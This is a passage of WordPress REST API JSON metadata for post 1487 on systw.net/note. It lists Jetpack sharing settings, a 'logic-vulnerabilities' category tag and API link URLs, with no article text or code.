jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1487","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1487"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1487\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}